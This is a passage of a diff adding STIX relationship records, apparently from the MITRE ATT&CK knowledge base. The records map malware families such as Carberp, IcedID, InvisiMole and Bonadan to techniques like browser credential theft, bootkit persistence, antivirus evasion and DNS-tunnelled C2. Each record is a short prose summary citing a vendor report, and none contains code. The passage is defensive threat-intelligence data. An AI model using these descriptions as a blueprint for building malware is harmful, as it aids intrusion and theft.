15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has created a hidden file in the Startup folder of the current user.(Citation: Trusteer Carberp October 2010)", + "relationship_type": "uses", + "id": "relationship--9b2a5ea0-3199-44ee-a5a5-959e95d3a2e5", + "type": "relationship", + "modified": "2020-08-03T15:17:31.931Z", + "created": "2020-07-15T20:23:36.330Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--fafa8b19-211d-4878-9d80-2126e1604b68", + "type": "relationship", + "modified": "2020-08-03T15:14:18.050Z", + "created": "2020-07-15T20:23:36.384Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--0d8d668e-ce2f-4ef8-8dd4-8c9cd17f2b23", + "type": "relationship", + "modified": "2020-07-29T21:36:24.368Z", + "created": "2020-07-15T20:23:36.388Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has searched the Image File Execution Options registry key for \"Debugger\" within every subkey.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--8de816a1-c89b-47ea-9456-c3bc139e6885", + "type": "relationship", + "modified": "2020-08-03T15:14:18.051Z", + "created": "2020-07-15T20:23:36.449Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--47b76146-c9d2-4012-932b-839c9756c2c9", + "type": "relationship", + "modified": "2020-07-29T21:36:24.386Z", + "created": "2020-07-15T20:23:36.451Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has queried the infected system's registry searching for specific registry keys associated with antivirus products.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--8121ed43-42eb-42ad-a86f-26fb53b71975", + "type": "relationship", + "modified": "2020-07-29T21:36:24.406Z", + "created": "2020-07-15T20:23:36.454Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) can start a remote VNC session by downloading a new plugin.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--34072026-f8dd-4eb0-88d9-c76cddfa8ca2", + "type": "relationship", + "modified": "2020-07-29T21:36:24.385Z", + "created": "2020-07-15T20:23:36.458Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has collected the operating system version from the infected system.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--dacff5f4-a7ed-424b-847b-377ed2b91679", + "type": "relationship", + "modified": "2020-08-03T15:14:18.115Z", + "created": "2020-07-15T20:23:36.473Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has used XOR-based encryption to mask C2 server locations within the trojan.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--c808ac7c-6da1-4be8-9233-0020fbc3e8ac", + "type": "relationship", + "modified": "2020-07-29T21:36:24.435Z", + "created": "2020-07-15T20:23:36.506Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "Trusteer Carberp October 2010", + "url": "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf", + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.(Citation: Trusteer Carberp October 2010)", + "relationship_type": "uses", + "id": "relationship--caa542d3-c8b0-4d10-998d-0998be406da8", + "type": "relationship", + "modified": "2020-08-03T15:17:31.951Z", + "created": "2020-07-15T20:23:36.519Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + }, + { + "source_name": "Trusteer Carberp October 2010", + "url": "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf", + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has captured credentials when a user performs login through a SSL session.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)", + "relationship_type": "uses", + "id": "relationship--4c7a0e49-6b38-417a-881b-6f9474ea4ec2", + "type": "relationship", + "modified": "2020-08-03T15:17:31.974Z", + "created": "2020-07-15T20:23:36.522Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) can capture display screenshots with the screens_dll.dll plugin.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--e1a70685-4492-4866-a10b-7630be265c86", + "type": "relationship", + "modified": "2020-07-29T21:36:24.469Z", + "created": "2020-07-15T20:23:36.544Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + }, + { + "source_name": "Trusteer Carberp October 2010", + "url": "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf", + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) can download and execute new plugins from the C2 server. (Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)", + "relationship_type": "uses", + "id": "relationship--320966af-53db-41e3-aaf0-f5fd68bce8ca", + "type": "relationship", + "modified": "2020-08-03T15:17:32.013Z", + "created": "2020-07-15T20:23:36.541Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has used user mode rootkit techniques to remain hidden on the system.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--21b929b8-8fec-47a5-8f98-554a043f9de5", + "type": "relationship", + "modified": "2020-07-29T21:36:24.467Z", + "created": "2020-07-15T20:23:36.560Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + }, + { + "source_name": "Trusteer Carberp October 2010", + "url": "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf", + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has masqueraded as Windows system file names, as well as \"chkntfs.exe\" and \"syscron.exe\".(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)", + "relationship_type": "uses", + "id": "relationship--201502c6-d208-408b-b6f3-50e39dab14ca", + "type": "relationship", + "modified": "2020-08-03T15:17:32.025Z", + "created": "2020-07-15T20:23:36.575Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "external_references": [ + { + "source_name": "ESET Carberp March 2012", + "url": "https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf", + "description": "Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You\u2019re in a Black Hole, Stop Digging. Retrieved July 15, 2020." + }, + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.(Citation: ESET Carberp March 2012)(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--5fdf6cb3-8046-4c32-aca6-75cda70b7614", + "type": "relationship", + "modified": "2020-07-29T21:36:24.489Z", + "created": "2020-07-15T20:23:36.579Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "external_references": [ + { + "source_name": "ESET Carberp March 2012", + "url": "https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf", + "description": "Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You\u2019re in a Black Hole, Stop Digging. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has installed a bootkit on the system to maintain persistence.(Citation: ESET Carberp March 2012)", + "relationship_type": "uses", + "id": "relationship--02c3d977-d797-4105-9535-11682d4896e9", + "type": "relationship", + "modified": "2020-07-15T20:23:36.581Z", + "created": "2020-07-15T20:23:36.581Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has maintained persistence by placing itself inside the current user's startup folder.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--23bc50df-16da-4b2d-89b3-1a74c7602aa2", + "type": "relationship", + "modified": "2020-07-29T21:36:24.496Z", + "created": "2020-07-15T20:23:36.591Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "external_references": [ + { + "source_name": "ESET Carberp March 2012", + "url": "https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf", + "description": "Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You\u2019re in a Black Hole, Stop Digging. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484)'s bootkit can inject a malicious DLL into the address space of running processes.(Citation: ESET Carberp March 2012)", + "relationship_type": "uses", + "id": "relationship--d5f2b0fc-c865-419d-aacd-8004ecba00df", + "type": "relationship", + "modified": "2020-08-03T15:14:18.118Z", + "created": "2020-07-15T20:23:36.593Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "external_references": [ + { + "source_name": "ESET Carberp March 2012", + "url": "https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf", + "description": "Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You\u2019re in a Black Hole, Stop Digging. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.(Citation: ESET Carberp March 2012)", + "relationship_type": "uses", + "id": "relationship--2c112e41-be75-4f99-84ac-ce7776f88fca", + "type": "relationship", + "modified": "2020-07-15T20:23:36.596Z", + "created": "2020-07-15T20:23:36.596Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has used HTTPS in communications with C2.(Citation: Juniper IcedID June 2020)", + "relationship_type": "uses", + "id": "relationship--b82ab6ba-b590-440d-bfd1-75f18560a8b4", + "type": "relationship", + "modified": "2020-07-15T20:33:40.790Z", + "created": "2020-07-15T20:33:40.790Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can collect information about installed software used by specific users, software executed on user login, and software executed by each system.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--af7ec7e9-08d2-4459-8c05-047185799058", + "type": "relationship", + "modified": "2020-10-21T17:38:02.243Z", + "created": "2020-07-16T15:07:27.066Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can check for the presence of network sniffers, AV, and BitDefender firewall.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--da7dbcec-4714-4bca-8b90-d3a0a95576d9", + "type": "relationship", + "modified": "2020-07-16T15:51:26.020Z", + "created": "2020-07-16T15:07:27.115Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--9c6804dc-e1d5-43f5-97ee-7d827c9d308d", + "type": "relationship", + "modified": "2020-07-16T15:07:27.123Z", + "created": "2020-07-16T15:07:27.123Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has used TCP to download additional modules.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--3957be97-305f-4d42-9978-868cb83918a2", + "type": "relationship", + "modified": "2020-07-16T15:07:27.128Z", + "created": "2020-07-16T15:07:27.128Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--db2b0471-38e9-4c50-bf96-1c498f38223c", + "type": "relationship", + "modified": "2020-07-16T15:10:35.305Z", + "created": "2020-07-16T15:10:35.305Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) can XOR-encrypt C2 communications.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--336e0a87-8ee2-420d-8fb8-10ea2c015723", + "type": "relationship", + "modified": "2020-07-23T16:24:07.845Z", + "created": "2020-07-16T15:10:35.331Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) can find the external IP address of the infected host.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--5239c6fe-bb67-48c0-bd77-2267e1e71cf3", + "type": "relationship", + "modified": "2020-07-16T15:10:35.341Z", + "created": "2020-07-16T15:10:35.341Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape 